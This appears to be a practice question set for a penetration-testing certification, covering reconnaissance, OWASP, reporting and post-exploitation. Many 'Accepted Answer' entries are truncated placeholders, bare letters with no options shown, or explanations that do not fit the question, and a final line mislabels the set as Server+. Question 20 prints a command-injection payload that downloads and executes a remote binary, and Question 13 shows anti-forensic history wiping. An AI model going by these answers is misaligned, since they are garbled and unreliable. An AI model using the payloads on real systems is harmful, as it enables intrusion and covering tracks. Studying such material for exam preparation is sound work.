Question 1

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

Accepted Answer

The penetration tester should reach out to the primary point of contact to inform them of the active exploitation so that immediate action can be taken to mitigate the threat.

Question 2

A consultant is reviewing the following output after reports of intermittent connectivity issues: ? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet] ? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet] ? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet] ? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet] ? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet] ? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet] ? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet] ? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet] Which of the following is MOST likely to be reported by the consultant?

Accepted Answer

B

Question 3

A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows: • The following request was intercepted going to the network device: GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk • Network management interfaces are available on the production network. • An Nmap scan returned the following:  Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

Accepted Answer

C,E

Question 4

A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

Accepted Answer

The failover environment may rely on resources not owned by the client, which could impact the effectiveness of the penetration test.

Question 5

A penetration tester wrote the following script to be used in one engagement:  Which of the following actions will this script perform?

Accepted Answer

The answer of A penetration tester wrote the following script...

Question 6

A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following: * Connected to 10.2.11.144 (::1) port 80 (#0) > GET /readmine.html HTTP/1.1 > Host: 10.2.11.144 > User-Agent: curl/7.67.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 < Date: Tue, 02 Feb 2021 21:46:47 GMT < Server: Apache/2.4.41 (Debian) < Content-Length: 317 < Content-Type: text/html; charset=iso-8859-1 <

 <!DOCTYPE html >
 <html lang="en"> >
 <meta name="viewport" content="width=device-width" / > 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" / >
 <title >WordPress › ReadMe</title>
 <link rel="stylesheet" href="wp-admin/css/install.css?ver=20100228" type="text/css" /> </head>

Which of the following tools would be BEST for the penetration tester to use to explore this site further?

Accepted Answer

The answer of A penetration tester is exploring a client's...

Question 7

Which of the following BEST describe the OWASP Top 10? (Choose two.)

Accepted Answer

The OWASP Top 10 is a list of the most critical web application security risks, and the risks are defined in order of importance.

Question 8

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

Accepted Answer

The answer of Which of the following web-application security risks...

Question 9

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

Accepted Answer

The answer of A penetration tester is preparing to perform...

Question 10

Given the following code: Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

Accepted Answer

The answer of Given the following code: Which of...

Question 11

Appending string values onto another string is called:

Accepted Answer

Concatenation is the correct term for appending or joining string values together in programming.

Question 12

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

Accepted Answer

The answer of A penetration tester who is doing a...

Question 13

A penetration tester gains access to a system and establishes persistence, and then runs the following commands: cat /dev/null > temp touch -r .bash_history temp mv temp .bash_history Which of the following actions is the tester MOST likely performing?

Accepted Answer

The tester is clearing the Bash history by redirecting /dev/null to a temporary file and then using the 'touch' command to set the timestamp of the temporary file to match the original .bash_history file before moving it back, effectively erasing the command history while maintaining the original timestamp.

Question 14

A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

Accepted Answer

The answer of A new security firm is onboarding its...

Question 15

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

Accepted Answer

A Statement of Work (SOW) outlines specific activities, deliverables, and schedules for a project, including penetration testing.

Question 16

Which of the following expressions in Python increase a variable val by one (Choose two.)

Accepted Answer

The answer of Which of the following expressions in Python...

Question 17

A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

Accepted Answer

The -A flag enables aggressive scanning, which includes version detection and script scanning. The -T4 flag sets the scan speed to 4, which is a good balance between speed and accuracy. The -p80 flag specifies the port to scan, which is 80 for HTTP.

Question 18

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

Accepted Answer

A recurring cybersecurity awareness education program will help employees recognize phishing attempts and understand the importance of not providing credentials on suspicious sites.

Question 19

Given the following output: User-agent:* Disallow: /author/ Disallow: /xmlrpc.php Disallow: /wp-admin Disallow: /page/ During which of the following activities was this output MOST likely obtained?

Accepted Answer

The output is a robots.txt file, which is used to tell search engines which parts of a website should not be crawled. This information is most likely obtained during website scraping, which is the process of extracting data from a website.

Question 20

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} - c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?

Accepted Answer

The exploit creates a file called apache in the /tmp directory and makes it executable. The penetration tester should remove this file after the engagement to prevent it from being used by other attackers.

Exam 13: CompTIA Server+